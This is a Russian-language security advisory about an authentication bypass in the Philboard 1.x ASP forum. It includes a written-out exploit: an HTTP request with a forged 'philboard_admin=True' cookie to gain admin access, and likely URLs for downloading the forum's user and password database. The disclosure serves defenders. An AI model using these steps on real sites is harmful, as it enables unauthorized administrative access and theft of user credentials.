Удаленный административный доступ в Philboard

Дата публикации:
02.06.2003
Дата изменения:
02.07.2008
Всего просмотров:
971
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Philboard 1.x
Описание: Уязвимость обнаружена в бесплатном ASP форуме Philboard. Удаленный пользователь может получить административные привилегии на системе.

Сообщается, что удаленный пользователь может установить куки форума к "philboard_admin=True;" или "admin=True;", чтобы получить привилегии администратора на системе. Эксплоит:

1) Login Administrator Forum:
Use your telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb
Уязвимость обнаружена в Philboard up to v1.14

Ссылки: Philboard Forum Vulnerability
или введите имя

CAPTCHA